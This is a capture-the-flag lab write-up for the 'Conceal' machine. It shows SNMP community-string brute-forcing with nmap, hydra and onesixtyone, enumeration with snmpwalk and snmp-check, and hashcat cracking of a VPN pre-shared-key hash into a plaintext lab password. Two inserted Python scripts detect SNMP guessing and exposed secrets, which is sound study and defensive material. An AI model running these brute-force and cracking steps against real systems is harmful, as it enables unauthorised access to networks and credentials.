SNMP


According to the Nmap scan reports, an SNMP server (agent) is running on the target's port 161. It appears to be using SNMP version 1 with the default community string, public.

Additionally, Nmap reported all the NICs, processes and services present on the target host.

Community String


┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ sudo nmap -sU --script snmp-brute -p161 $IP 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-20 02:46 CET
Nmap scan report for 10.10.10.116
Host is up (0.033s latency).
 
PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials
 
Nmap done: 1 IP address (1 host up) scanned in 2.12 seconds

Nmap already did it as part of the simple script operation, but I can confirm the community string again by brute-forcing it.

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt snmp://$IP
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-20 02:48:22
[DATA] max 16 tasks per 1 server, overall 16 tasks, 3217 login tries (l:1/p:3217), ~202 tries per task
[DATA] attacking snmp://10.10.10.116:161/
[161][snmp] host: 10.10.10.116   password: public
[STATUS] attack finished for 10.10.10.116 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-20 02:48:22

Hydra can also do this.

┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt $IP/24
Scanning 256 hosts, 3219 communities
10.10.10.116 [public] Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)

Another tool that I can use is onesixtyone, which is specialized for mass SNMP scanning. Notice the wildcard bit that I put after the $IP variable.
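From the monitoring side, the community-string guessing shown above is visible on the wire, because SNMPv1/v2c carries the community in cleartext in every request and response. The following is an added example, not part of the original write-up: it decodes the message header from UDP/161 payloads and flags both a source trying many communities and an agent answering a default one. The addresses, the threshold and the sample packets are constructed for illustration.

```python
"""Decode the SNMPv1/v2c message header and flag community-string guessing."""
from collections import defaultdict

DEFAULT_COMMUNITIES = {"public", "private"}   # well-known defaults
VERSIONS = {0: "v1", 1: "v2c"}                # value of the version INTEGER
GET_RESPONSE = 0xA2                           # PDU tag of a GetResponse


def _read_tlv(buf, pos):
    """Return (tag, value_bytes, next_pos) for one BER TLV starting at pos."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                         # long form: low 7 bits = count of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("value runs past end of datagram")
    return tag, buf[pos:pos + length], pos + length


def parse_header(datagram):
    """Return (version, community, pdu_tag), or None if not SNMPv1/v2c."""
    try:
        tag, body, _ = _read_tlv(datagram, 0)
        if tag != 0x30:                       # outer SEQUENCE
            return None
        tag, ver, pos = _read_tlv(body, 0)
        if tag != 0x02 or not ver:            # INTEGER version
            return None
        version = VERSIONS.get(int.from_bytes(ver, "big"))
        if version is None:                   # e.g. 3 = SNMPv3, which has no community
            return None
        tag, community, pos = _read_tlv(body, pos)
        if tag != 0x04:                       # OCTET STRING community
            return None
        pdu_tag, _, _ = _read_tlv(body, pos)
    except ValueError:
        return None
    return version, community.decode("latin-1"), pdu_tag


def audit(packets, guess_threshold=5):
    """packets: iterable of (source_ip, udp_payload). Returns a list of findings."""
    tried = defaultdict(set)                  # requester -> distinct communities sent
    accepted = defaultdict(set)               # responder -> communities it answered
    for src, payload in packets:
        hdr = parse_header(payload)
        if hdr is None:
            continue
        _version, community, pdu_tag = hdr
        (accepted if pdu_tag == GET_RESPONSE else tried)[src].add(community)
    findings = []
    for src, comms in sorted(tried.items()):
        if len(comms) >= guess_threshold:
            findings.append(("community-guessing", src, len(comms)))
    for src, comms in sorted(accepted.items()):
        for name in sorted(comms & DEFAULT_COMMUNITIES):
            findings.append(("default-community-accepted", src, name))
    return findings


def _tlv(tag, value):
    return bytes([tag, len(value)]) + value   # short-form length, enough for the sample


def build_message(version, community, pdu_tag):
    """Build a minimal SNMP message (constructed sample data, empty varbind list)."""
    pdu = _tlv(pdu_tag, _tlv(2, b"\x01") + _tlv(2, b"\x00") + _tlv(2, b"\x00") + _tlv(0x30, b""))
    return _tlv(0x30, _tlv(2, bytes([version])) + _tlv(4, community.encode()) + pdu)


# Constructed traffic: one source cycles through six communities, the agent
# answers only the request that used "public".
SCANNER, AGENT = "192.0.2.50", "192.0.2.10"
SAMPLE = [(SCANNER, build_message(0, c, 0xA0))
          for c in ("admin", "cisco", "manager", "monitor", "private", "public")]
SAMPLE.append((AGENT, build_message(0, "public", GET_RESPONSE)))

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```
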

Enumeration


There are two notable tools when it comes to enumerating SNMP agents. The first one is snmpwalk, which is part of the net-snmp suite. snmpwalk allows users to finely control the query; users are able to query for a specific OID or MIB.

The second one is snmp-check, which mainly focuses on general enumeration. snmp-check displays output in a much more user-friendly manner compared to the first one.

snmpwalk


┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ snmpwalk -v 1 -c public $IP
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (2532619) 7:02:06.19
SNMPv2-MIB::sysContact.0 = STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
SNMPv2-MIB::sysName.0 = STRING: Conceal
SNMPv2-MIB::sysLocation.0 = STRING: 
SNMPv2-MIB::sysServices.0 = INTEGER: 76
IF-MIB::ifNumber.0 = INTEGER: 15
IF-MIB::ifIndex.1 = INTEGER: 1
IF-MIB::ifIndex.2 = INTEGER: 2
IF-MIB::ifIndex.3 = INTEGER: 3
IF-MIB::ifIndex.4 = INTEGER: 4
IF-MIB::ifIndex.5 = INTEGER: 5
IF-MIB::ifIndex.6 = INTEGER: 6
IF-MIB::ifIndex.7 = INTEGER: 7
IF-MIB::ifIndex.8 = INTEGER: 8
IF-MIB::ifIndex.9 = INTEGER: 9
IF-MIB::ifIndex.10 = INTEGER: 10
IF-MIB::ifIndex.11 = INTEGER: 11
IF-MIB::ifIndex.12 = INTEGER: 12
IF-MIB::ifIndex.13 = INTEGER: 13
IF-MIB::ifIndex.14 = INTEGER: 14
IF-MIB::ifIndex.15 = INTEGER: 15
IF-MIB::ifDescr.1 = STRING: Software Loopback Interface 1.
IF-MIB::ifDescr.2 = STRING: WAN Miniport (IKEv2).
IF-MIB::ifDescr.3 = STRING: WAN Miniport (PPTP).
IF-MIB::ifDescr.4 = STRING: Microsoft Kernel Debug Network Adapter.
IF-MIB::ifDescr.5 = STRING: WAN Miniport (L2TP).
IF-MIB::ifDescr.6 = STRING: Teredo Tunneling Pseudo-Interface.
IF-MIB::ifDescr.7 = STRING: WAN Miniport (IP).
IF-MIB::ifDescr.8 = STRING: WAN Miniport (SSTP).
IF-MIB::ifDescr.9 = STRING: WAN Miniport (IPv6).
IF-MIB::ifDescr.10 = STRING: WAN Miniport (PPPOE).
IF-MIB::ifDescr.11 = STRING: WAN Miniport (Network Monitor).
IF-MIB::ifDescr.12 = STRING: vmxnet3 Ethernet Adapter.
IF-MIB::ifDescr.13 = STRING: vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000.
IF-MIB::ifDescr.14 = STRING: vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000.
IF-MIB::ifDescr.15 = STRING: vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-0000.
IF-MIB::ifType.1 = INTEGER: softwareLoopback(24)
IF-MIB::ifType.2 = INTEGER: tunnel(131)
IF-MIB::ifType.3 = INTEGER: tunnel(131)
IF-MIB::ifType.4 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.5 = INTEGER: tunnel(131)
IF-MIB::ifType.6 = INTEGER: tunnel(131)
IF-MIB::ifType.7 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.8 = INTEGER: tunnel(131)
IF-MIB::ifType.9 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.10 = INTEGER: ppp(23)
IF-MIB::ifType.11 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.12 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.13 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.14 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.15 = INTEGER: ethernetCsmacd(6)
 
[...REDACTED...]

As shown above, snmpwalk displays the output of the raw MIB data.

There is an interesting MIB, SNMPv2-MIB::sysContact.0.

It contains string data instead of OID info:

STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43

It says that it is a password PSK hash for IKE VPN.

Another thing to notice here is that the agent uses SNMP v2. I guess Nmap categorizes it under SNMP v1 since they both have the same weak security measure. For Nmap, it's either SNMPv1 or SNMPv3.
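The sysContact finding above is the kind of exposure an administrator can catch by walking their own agents and scanning the free-text values. The following is an added example, not part of the original write-up: it parses snmpwalk output in the format shown above, flags STRING values that contain credential keywords or digest-length hex strings, and masks the digest in its report. The keyword list and the digest lengths (32, 40, 64 hex characters) are assumptions chosen for illustration.

```python
"""Flag secrets exposed in free-text objects of an snmpwalk dump."""
import re

# "<MIB>::<object>.<index> = <TYPE>: <value>", as printed by net-snmp's snmpwalk
LINE = re.compile(r"^(?P<oid>\S+) = (?P<type>[A-Za-z][\w-]*): ?(?P<value>.*)$")
# Assumed keyword list; extend it to match local naming habits.
KEYWORD = re.compile(r"\b(pass(?:word|wd)?|psk|secret|pre-?shared|credentials?)\b", re.I)
# Standalone hex runs of common digest lengths (longest alternative first).
DIGEST = re.compile(
    r"(?<![0-9A-Fa-f])(?:[0-9A-Fa-f]{64}|[0-9A-Fa-f]{40}|[0-9A-Fa-f]{32})(?![0-9A-Fa-f])"
)


def _mask(value):
    """Keep the first four characters of each digest so the report does not re-leak it."""
    return DIGEST.sub(lambda m: m.group(0)[:4] + "*" * (len(m.group(0)) - 4), value)


def audit_walk(text):
    """Return one finding per STRING object whose value looks like it holds a secret."""
    findings = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m or m["type"] != "STRING":    # OIDs, integers, timeticks are skipped
            continue
        value = m["value"].strip('"')
        reasons = []
        if KEYWORD.search(value):
            reasons.append("credential-keyword")
        reasons += sorted({"hex-digest-%d" % len(d) for d in DIGEST.findall(value)})
        if reasons:
            findings.append({"oid": m["oid"], "reasons": reasons, "value": _mask(value)})
    return findings


# Lines copied from the snmpwalk output shown on this page.
SAMPLE_WALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.311.1.1.3.1.1
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (2532619) 7:02:06.19
SNMPv2-MIB::sysContact.0 = STRING: IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
SNMPv2-MIB::sysName.0 = STRING: Conceal
SNMPv2-MIB::sysLocation.0 = STRING: 
IF-MIB::ifDescr.2 = STRING: WAN Miniport (IKEv2).
IF-MIB::ifDescr.13 = STRING: vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000.
"""

if __name__ == "__main__":
    for finding in audit_walk(SAMPLE_WALK):
        print(finding["oid"], finding["reasons"], finding["value"])
```
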

snmp-check


┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ snmp-check -p 161 -c public -v 1 $IP 
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
 
[+] try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'
 
[*] system information:
 
  host ip address               : 10.10.10.116
  hostname                      : Conceal
  description                   : Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
  contact                       : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
  location                      : -
  uptime snmp                   : 06:56:58.96
  uptime system                 : 06:56:46.17
  system date                   : 2023-1-20 02:04:14.2
  domain                        : WORKGROUP
 
[*] user accounts:
 
  Guest               
  Destitute           
  Administrator       
  DefaultAccount      
 
[*] network information:
 
  ip forwarding enabled         : no
  default ttl                   : 128
  tcp segments received         : 177135
  tcp segments sent             : 8
  tcp segments retrans          : 4
  input datagrams               : 184288
  delivered datagrams           : 184257
  output datagrams              : 7109
 
[*] network interfaces:
 
  interface                     : [ up ] Software Loopback Interface 1
  id                            : 1
  mac address                   : :::::
  type                          : softwareLoopback
  speed                         : 1073 Mbps
  mtu                           : 1500
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] WAN Miniport (IKEv2)
  id                            : 2
  mac address                   : :::::
  type                          : unknown
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] WAN Miniport (PPTP)
  id                            : 3
  mac address                   : :::::
  type                          : unknown
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] Microsoft Kernel Debug Network Adapter
  id                            : 4
  mac address                   : :::::
  type                          : ethernet-csmacd
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] WAN Miniport (L2TP)
  id                            : 5
  mac address                   : :::::
  type                          : unknown
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] Teredo Tunneling Pseudo-Interface
  id                            : 6
  mac address                   : 00:00:00:00:00:00
  type                          : unknown
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] WAN Miniport (IP)
  id                            : 7
  mac address                   : :::::
  type                          : ethernet-csmacd
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] WAN Miniport (SSTP)
  id                            : 8
  mac address                   : :::::
  type                          : unknown
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] WAN Miniport (IPv6)
  id                            : 9
  mac address                   : :::::
  type                          : ethernet-csmacd
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] WAN Miniport (PPPOE)
  id                            : 10
  mac address                   : :::::
  type                          : ppp
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ down ] WAN Miniport (Network Monitor)
  id                            : 11
  mac address                   : :::::
  type                          : ethernet-csmacd
  speed                         : 0 Mbps
  mtu                           : 0
  in octets                     : 0
  out octets                    : 0
 
  interface                     : [ up ] vmxnet3 Ethernet Adapter
  id                            : 12
  mac address                   : 00:50:56:b9:d5:79
  type                          : ethernet-csmacd
  speed                         : 4294 Mbps
  mtu                           : 1500
  in octets                     : 18057639
  out octets                    : 670629
 
  interface                     : [ up ] vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000
  id                            : 13
  mac address                   : 00:50:56:b9:d5:79
  type                          : ethernet-csmacd
  speed                         : 4294 Mbps
  mtu                           : 1500
  in octets                     : 18057639
  out octets                    : 670629
 
  interface                     : [ up ] vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000
  id                            : 14
  mac address                   : 00:50:56:b9:d5:79
  type                          : ethernet-csmacd
  speed                         : 4294 Mbps
  mtu                           : 1500
  in octets                     : 18057639
  out octets                    : 670629
 
  interface                     : [ up ] vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-0000
  id                            : 15
  mac address                   : 00:50:56:b9:d5:79
  type                          : ethernet-csmacd
  speed                         : 4294 Mbps
  mtu                           : 1500
  in octets                     : 18057639
  out octets                    : 670629
 
 
[*] network ip:
 
  Id                    IP Address            Netmask               Broadcast           
  12                    10.10.10.116          255.255.255.0         1                   
  1                     127.0.0.1             255.0.0.0             1                   
 
[*] routing information:
 
  Destination           Next hop              Mask                  Metric              
  0.0.0.0               10.10.10.2            0.0.0.0               271                 
  10.10.10.0            10.10.10.116          255.255.255.0         271                 
  10.10.10.116          10.10.10.116          255.255.255.255       271                 
  10.10.10.255          10.10.10.116          255.255.255.255       271                 
  127.0.0.0             127.0.0.1             255.0.0.0             331                 
  127.0.0.1             127.0.0.1             255.255.255.255       331                 
  127.255.255.255       127.0.0.1             255.255.255.255       331                 
  224.0.0.0             127.0.0.1             240.0.0.0             331                 
  255.255.255.255       127.0.0.1             255.255.255.255       331                 
 
[*] tcp connections and listening ports:
 
  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               21                    0.0.0.0               0                     listen              
  0.0.0.0               80                    0.0.0.0               0                     listen              
  0.0.0.0               135                   0.0.0.0               0                     listen              
  0.0.0.0               445                   0.0.0.0               0                     listen              
  0.0.0.0               49664                 0.0.0.0               0                     listen              
  0.0.0.0               49665                 0.0.0.0               0                     listen              
  0.0.0.0               49666                 0.0.0.0               0                     listen              
  0.0.0.0               49667                 0.0.0.0               0                     listen              
  0.0.0.0               49668                 0.0.0.0               0                     listen              
  0.0.0.0               49669                 0.0.0.0               0                     listen              
  0.0.0.0               49670                 0.0.0.0               0                     listen              
  10.10.10.116          139                   0.0.0.0               0                     listen              
 
[*] listening udp ports:
 
  Local address         Local port          
  0.0.0.0               123                 
  0.0.0.0               161                 
  0.0.0.0               500                 
  0.0.0.0               4500                
  0.0.0.0               5050                
  0.0.0.0               5353                
  0.0.0.0               5355                
  10.10.10.116          137                 
  10.10.10.116          138                 
  10.10.10.116          1900                
  10.10.10.116          49292               
  127.0.0.1             1900                
  127.0.0.1             49293               
 
[*] network services:
 
  Index                 Name                
  0                     Power               
  1                     Server              
  2                     Themes              
  3                     IP Helper           
  4                     DNS Client          
  5                     Data Usage          
  6                     Superfetch          
  7                     DHCP Client         
  8                     Time Broker         
  9                     TokenBroker         
  10                    Workstation         
  11                    SNMP Service        
  12                    User Manager        
  13                    VMware Tools        
  14                    Windows Time        
  15                    CoreMessaging       
  16                    Plug and Play       
  17                    Print Spooler       
  18                    Windows Audio       
  19                    SSDP Discovery      
  20                    Task Scheduler      
  21                    Windows Search      
  22                    Security Center     
  23                    Storage Service     
  24                    Windows Firewall    
  25                    CNG Key Isolation   
  26                    COM+ Event System   
  27                    Windows Event Log   
  28                    IPsec Policy Agent  
  29                    Geolocation Service 
  30                    Group Policy Client 
  31                    RPC Endpoint Mapper 
  32                    Data Sharing Service
  33                    Device Setup Manager
  34                    Network List Service
  35                    System Events Broker
  36                    User Profile Service
  37                    Base Filtering Engine
  38                    Local Session Manager
  39                    Microsoft FTP Service
  40                    TCP/IP NetBIOS Helper
  41                    Cryptographic Services
  42                    Tile Data model server
  43                    COM+ System Application
  44                    Diagnostic Service Host
  45                    Shell Hardware Detection
  46                    State Repository Service
  47                    Diagnostic Policy Service
  48                    Network Connection Broker
  49                    Security Accounts Manager
  50                    Network Location Awareness
  51                    Windows Connection Manager
  52                    Windows Font Cache Service
  53                    Remote Procedure Call (RPC)
  54                    DCOM Server Process Launcher
  55                    Windows Audio Endpoint Builder
  56                    Application Host Helper Service
  57                    Network Store Interface Service
  58                    Distributed Link Tracking Client
  59                    System Event Notification Service
  60                    World Wide Web Publishing Service
  61                    Connected Devices Platform Service
  62                    Windows Defender Antivirus Service
  63                    Windows Management Instrumentation
  64                    Windows Process Activation Service
  65                    Distributed Transaction Coordinator
  66                    IKE and AuthIP IPsec Keying Modules
  67                    VMware CAF Management Agent Service
  68                    VMware Physical Disk Helper Service
  69                    Background Intelligent Transfer Service
  70                    Background Tasks Infrastructure Service
  71                    Program Compatibility Assistant Service
  72                    VMware Alias Manager and Ticket Service
  73                    Connected User Experiences and Telemetry
  74                    WinHTTP Web Proxy Auto-Discovery Service
  75                    Windows Defender Security Centre Service
  76                    Windows Push Notifications System Service
  77                    Windows Defender Antivirus Network Inspection Service
  78                    Windows Driver Foundation - User-mode Driver Framework
 
[*] processes:
 
  Id                    Status                Name                  Path                  Parameters          
  1                     running               System Idle Process                                             
  4                     running               System                                                          
  300                   running               smss.exe                                                        
  316                   running               svchost.exe           c:\Windows\System32\  -k LocalSystemNetworkRestricted
  332                   running               svchost.exe           c:\Windows\system32\  -k LocalService     
  336                   running               svchost.exe           c:\Windows\system32\  -k LocalServiceNoNetwork
  396                   running               csrss.exe                                                       
  476                   running               wininit.exe                                                     
  484                   running               csrss.exe                                                       
  540                   running               winlogon.exe                                                    
  620                   running               services.exe                                                    
  628                   running               lsass.exe             c:\Windows\system32\                      
  716                   running               svchost.exe           c:\Windows\system32\  -k DcomLaunch       
  736                   running               fontdrvhost.exe                                                 
  744                   running               fontdrvhost.exe                                                 
  756                   running               svchost.exe           c:\Windows\system32\  -k LocalSystemNetworkRestricted
  832                   running               svchost.exe           c:\Windows\system32\  -k RPCSS            
  924                   running               dwm.exe                                                         
  964                   running               svchost.exe           c:\Windows\system32\  -k netsvcs          
  1012                  running               svchost.exe           c:\Windows\System32\  -k LocalServiceNetworkRestricted
  1064                  running               svchost.exe           c:\Windows\System32\  -k NetworkService   
  1164                  running               vmacthlp.exe          c:\Program Files\VMware\VMware Tools\                      
  1180                  running               Memory Compression                                              
  1328                  running               svchost.exe           c:\Windows\System32\  -k LocalServiceNetworkRestricted
  1372                  running               svchost.exe           c:\Windows\System32\  -k LocalServiceNetworkRestricted
  1380                  running               svchost.exe           c:\Windows\system32\  -k LocalServiceNetworkRestricted
  1512                  running               spoolsv.exe           c:\Windows\System32\                      
  1632                  running               svchost.exe           c:\Windows\system32\  -k appmodel         
  1748                  running               svchost.exe           c:\Windows\system32\  -k apphost          
  1756                  running               svchost.exe           c:\Windows\System32\  -k utcsvc           
  1784                  running               svchost.exe           c:\Windows\system32\  -k ftpsvc           
  1852                  running               snmp.exe              c:\Windows\System32\                      
  1864                  running               SecurityHealthService.exe                                            
  1900                  running               vgauthservice.exe     c:\Program Files\VMware\VMware Tools\VMware VGAuth\                      
  1912                  running               vmtoolsd.exe          c:\Program Files\VMware\VMware Tools\                      
  1928                  running               managementagenthost.exe  c:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\                      
  1944                  running               svchost.exe           c:\Windows\system32\  -k iissvcs          
  1956                  running               MsMpEng.exe                                                     
  2352                  running               logonui.exe                                 /flags:0x0 /state0:0xa3a28855 /state1:0x41c64e6d
  2396                  running               searchfilterhost.exe  c:\Windows\system32\  0 692 696 704 8192 700
  2556                  running               svchost.exe           c:\Windows\system32\  -k NetworkServiceNetworkRestricted
  2864                  running               wmiprvse.exe          c:\Windows\system32\wbem\                      
  2880                  running               searchindexer.exe     c:\Windows\system32\  /Embedding          
  3064                  running               dllhost.exe           c:\Windows\system32\  /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
  3272                  running               NisSrv.exe                                                      
  3472                  running               msdtc.exe             c:\Windows\System32\                      
  3584                  running               svchost.exe           c:\Windows\system32\  -k LocalServiceAndNoImpersonation
  5044                  running               searchprotocolhost.exe  c:\Windows\system32\  Global\UsGthrFltPipeMssGthrPipe81_ Global\UsGthrCtrlFltPipeMssGthrPipe81 1 -2147483646 "Software\Microsoft\Windows Search" "Moz
 
[*] storage information:
 
  description                   : ["C:\\ Label:  Serial Number 91180ed"]
  device id                     : [#<SNMP::Integer:0x00007fe4f1593660 @value=1>]
  filesystem type               : ["unknown"]
  device unit                   : [#<SNMP::Integer:0x00007fe4f1591770 @value=4096>]
  memory size                   : 14.51 GB
  memory used                   : 10.09 GB
 
  description                   : ["Virtual Memory"]
  device id                     : [#<SNMP::Integer:0x00007fe4f1801aa0 @value=2>]
  filesystem type               : ["unknown"]
  device unit                   : [#<SNMP::Integer:0x00007fe4f18179e0 @value=65536>]
  memory size                   : 3.12 GB
  memory used                   : 830.94 MB
 
  description                   : ["Physical Memory"]
  device id                     : [#<SNMP::Integer:0x00007fe4f18295c8 @value=3>]
  filesystem type               : ["unknown"]
  device unit                   : [#<SNMP::Integer:0x00007fe4f1830990 @value=65536>]
  memory size                   : 2.00 GB
  memory used                   : 756.00 MB
 
 
[*] file system information:
 
  index                         : 1
  mount point                   : 
  remote mount point            : -
  access                        : 1
  bootable                      : 0
 
[*] device information:
 
  Id                    Type                  Status                Descr               
  1                     unknown               running               Microsoft XPS Document Writer v4
  2                     unknown               running               Microsoft Print To PDF
  3                     unknown               running               Microsoft Shared Fax Driver
  4                     unknown               running               Unknown Processor Type
  5                     unknown               running               Unknown Processor Type
  6                     unknown               unknown               Software Loopback Interface 1
  7                     unknown               unknown               WAN Miniport (IKEv2)
  8                     unknown               unknown               WAN Miniport (PPTP) 
  9                     unknown               unknown               Microsoft Kernel Debug Network Adapter
  10                    unknown               unknown               WAN Miniport (L2TP) 
  11                    unknown               unknown               Teredo Tunneling Pseudo-Interface
  12                    unknown               unknown               WAN Miniport (IP)   
  13                    unknown               unknown               WAN Miniport (SSTP) 
  14                    unknown               unknown               WAN Miniport (IPv6) 
  15                    unknown               unknown               WAN Miniport (PPPOE)
  16                    unknown               unknown               WAN Miniport (Network Monitor)
  17                    unknown               unknown               vmxnet3 Ethernet Adapter
  18                    unknown               unknown               vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter
  19                    unknown               unknown               vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000
  20                    unknown               unknown               vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-
  21                    unknown               running               Fixed Disk          
  22                    unknown               running               IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
 
[*] software components:
 
  Index                 Name                
  1                     Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
  2                     VMware Tools        
  3                     Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
 
[*] iis server information:
 
  totalbytessentlowword         : 0
  totalbytesreceivedlowword     : 0
  totalfilessent                : 0
  currentanonymoususers         : 0
  currentnonanonymoususers      : 0
  totalanonymoususers           : 0
  totalnonanonymoususers        : 0
  maxanonymoususers             : 0
  maxnonanonymoususers          : 0
  currentconnections            : 0
  maxconnections                : 0
  connectionattempts            : 0
  logonattempts                 : 0
  gets                          : 0
  posts                         : 0
  heads                         : 0
  others                        : 0
  cgirequests                   : 0
  bgirequests                   : 0
  notfounderrors                : 0

As shown above, snmp-check does the same enumeration, but presents the output better. Although it doesn’t necessarily show the exact version like snmpwalk did earlier, it’s nice to see all the enumerated MIB data restructured for a better viewing experience.

It also picked up the contact MIB.

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/conceal]
└─$ hashcat -a 0 -m 1000 hashes/psk /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
9c8b1a372b1878851be2c097031b6e43:Dudecake1!               
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: 9c8b1a372b1878851be2c097031b6e43
Time.Started.....: Fri Jan 20 03:50:42 2023 (4 secs)
Time.Estimated...: Fri Jan 20 03:50:46 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2772.4 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11221248/14344385 (78.23%)
Rejected.........: 0/11221248 (0.00%)
Restore.Point....: 11220480/14344385 (78.22%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Dupaszamana11 -> Ducky22BH
Hardware.Mon.#1..: Util: 40%
 
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Fri Jan 20 03:50:29 2023
Stopped: Fri Jan 20 03:50:48 2023

The password hash turns out to be an NTLM hash. Hashcat was able to crack it easily. It’s Dudecake1!